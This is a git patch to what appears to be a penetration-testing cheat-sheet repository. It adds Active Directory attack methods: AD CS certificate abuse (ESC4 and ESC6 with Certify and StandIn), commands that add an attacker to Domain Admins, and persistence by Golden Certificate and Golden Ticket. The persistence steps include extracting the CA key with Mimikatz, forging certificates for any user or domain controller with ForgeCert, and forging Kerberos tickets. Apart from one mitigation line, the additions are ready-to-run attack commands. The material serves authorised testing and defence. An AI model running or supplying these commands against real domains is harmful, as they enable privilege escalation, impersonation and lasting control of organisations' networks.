From b5df6e1447596cb675a6c8c5351d546c1d531a83 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 1 Jan 2022 20:42:58 +0100
Subject: [PATCH] ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 + Golden Certificate

---
 .../Active Directory Attack.md                | 37 ++++++++++---
 .../Windows - Persistence.md                  | 52 +++++++++++++++++++
 2 files changed, 83 insertions(+), 6 deletions(-)

diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 474dff3..b0600c7 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -76,6 +76,7 @@
       - [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates)
       - [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates)
       - [ESC4 - Access Control Vulnerabilities](#esc4---access-control-vulnerabilities)
+      * [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2)
       - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
     - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
     - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
@@ -2182,7 +2183,8 @@ secretsdump.py -k -no-pass target.lab.local
 
 ### Active Directory Certificate Services
 
-Find ADCS Server : `crackmapexec ldap domain.lab -u username -p password -M adcs`
+* Find ADCS Server : `crackmapexec ldap domain.lab -u username -p password -M adcs`
+* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`
 
 #### ESC1 - Misconfigured Certificate Templates
 
@@ -2197,6 +2199,7 @@ Exploitation:
 * Use [Certify.exe](https://github.com/GhostPack/Certify) to see if there are any vulnerable templates
     ```ps1
     Certify.exe find /vulnerable
+    Certify.exe find /vulnerable /currentuser
     or
     PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
     ```
@@ -2223,7 +2226,7 @@ Exploitation:
 #### ESC2 - Misconfigured Certificate Templates
 
 Requirements:
-*  Allows requesters to specify a SAN in the CSR as well as allows Any Purpose EKU (2.5.29.37.0)
+*  Allows requesters to specify a Subject Alternative Name (SAN) in the CSR as well as allows Any Purpose EKU (2.5.29.37.0)
 
 Exploitation:
 * Find template
@@ -2235,6 +2238,8 @@ Exploitation:
 
 #### ESC4 - Access Control Vulnerabilities
 
+> Enabling the `mspki-certificate-name-flag` flag for a template that allows for domain authentication, allow attackers to "push a misconfiguration to a template leading to ESC1 vulnerability
+
 * Search for `WriteProperty` with value `00000000-0000-0000-0000-000000000000` using [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate)
   ```ps1
   python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -get-acl
@@ -2242,12 +2247,32 @@ Exploitation:
 * Add the `ENROLLEE_SUPPLIES_SUBJECT` (ESS) flag to perform ESC1
   ```ps1
   python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -add enrollee_supplies_subject -property mspki-Certificate-Name-Flag
+
+  # Add/remove ENROLLEE_SUPPLIES_SUBJECT flag from the WebServer template. 
+  C:\>StandIn.exe --adcs --filter WebServer --ess --add
   ```
 * Perform ESC1 and then restore the value
   ```ps1
   python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag
   ```
 
+#### ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 
+
+> If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name. 
+
+Exploitation:
+* Use [Certify.exe](https://github.com/GhostPack/Certify) to check for **UserSpecifiedSAN** flag state which refers to the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag.
+    ```ps1
+    Certify.exe cas
+    ```
+* Request a certificate for a template and add an altname, even though the default `User` template doesn't normally allow to specify alternative names
+    ```ps1
+    .\Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:User /altname:DomAdmin
+    ```
+
+Mitigation:   
+* Remove the flag : `certutil.exe -config "CA01.domain.local\CA01" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2`
+
 
 #### ESC8 - AD CS Relay Attack
 
@@ -2363,13 +2388,13 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr
 #### GenericAll
 
 * **GenericAll on User** : We can reset user's password without knowing the current password
-* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : 
-	* On Windows : `net group "domain admins" spotless /add /domain`
+* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user hacker) to the Domain Admin group : 
+	* On Windows : `net group "domain admins" hacker /add /domain`
 	* On Linux:
 		* using the Samba software suite : 
-		`net rpc group ADDMEM "GROUP NAME" UserToAdd -U 'AttackerUser%MyPassword' -W DOMAIN -I [DC IP]`
+		`net rpc group ADDMEM "GROUP NAME" UserToAdd -U 'hacker%MyPassword123' -W DOMAIN -I [DC IP]`
 		* using bloodyAD: 
-		`bloodyAD.py --host [DC IP] -d DOMAIN -u AttackerUser -p MyPassword addObjectToGroup UserToAdd 'GROUP NAME'`
+		`bloodyAD.py --host [DC IP] -d DOMAIN -u hacker -p MyPassword123 addObjectToGroup UserToAdd 'GROUP NAME'`
 
 * **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a TGS, then grab its hash and kerberoast it.
   ```powershell
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index 916f67e..3c5252c 100644
--- a/Methodology and Resources/Windows - Persistence.md	
+++ b/Methodology and Resources/Windows - Persistence.md	
@@ -29,6 +29,9 @@
         * [sethc.exe](#sethc.exe)
     * [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing)
     * [Skeleton Key](#skeleton-key)
+* [Domain](#domain)
+    * [Golden Certificate](#golden-certificate)
+    * [Golden Ticket](#golden-ticket)
 * [References](#references)
 
 
@@ -381,6 +384,54 @@ Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DC
 Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\Administrator
 ```
 
+## Domain
+
+### User Certificate
+
+```ps1
+# Request a certificate for the User template
+.\Certify.exe request /ca:CA01.megacorp.local\CA01 /template:User
+
+# Convert the certificate for Rubeus
+openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
+
+# Request a TGT using the certificate
+.\Rubeus.exe asktgt /user:username /certificate:C:\Temp\cert.pfx /password:Passw0rd123!
+```
+
+### Golden Certificate
+
+> Require elevated privileges in the Active Directory, or on the ADCS machine
+
+* Export CA as p12 file: `certsrv.msc` > `Right Click` > `Back up CA...`
+* Alternative 1: Using Mimikatz you can extract the certificate as PFX/DER 
+    ```ps1
+    privilege::debug
+    crypto::capi
+    crypto::cng
+    crypto::certificates /systemstore:local_machine /store:my /export
+    ```
+* Alternative 2: Using SharpDPAPI, then convert the certificate: `openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx`
+* [ForgeCert](https://github.com/GhostPack/ForgeCert) - Forge a certificate for any active domain user using the CA certificate
+    ```ps1
+    ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123 --Subject CN=User --SubjectAltName harry@lab.local --NewCertPath harry.pfx --NewCertPassword Password123
+    ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123 --Subject CN=User --SubjectAltName DC$@lab.local --NewCertPath dc.pfx --NewCertPassword Password123
+    ```
+* Finally you can request a TGT using the Certificate
+    ```ps1
+    Rubeus.exe asktgt /user:ron /certificate:harry.pfx /password:Password123
+    ```
+
+### Golden Ticket
+
+> Forge a Golden ticket using Mimikatz
+
+```ps1
+kerberos::purge
+kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
+kerberos::tgt
+```
+
 ## References
 
 * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
@@ -393,3 +444,4 @@ Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\Administr
 * [Persistence - BITS Jobs - @netbiosX](https://pentestlab.blog/2019/10/30/persistence-bits-jobs/)
 * [Persistence – Image File Execution Options Injection - @netbiosX](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/)
 * [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/)
+* [Golden Certificate - NOVEMBER 15, 2021](https://pentestlab.blog/2021/11/15/golden-certificate/)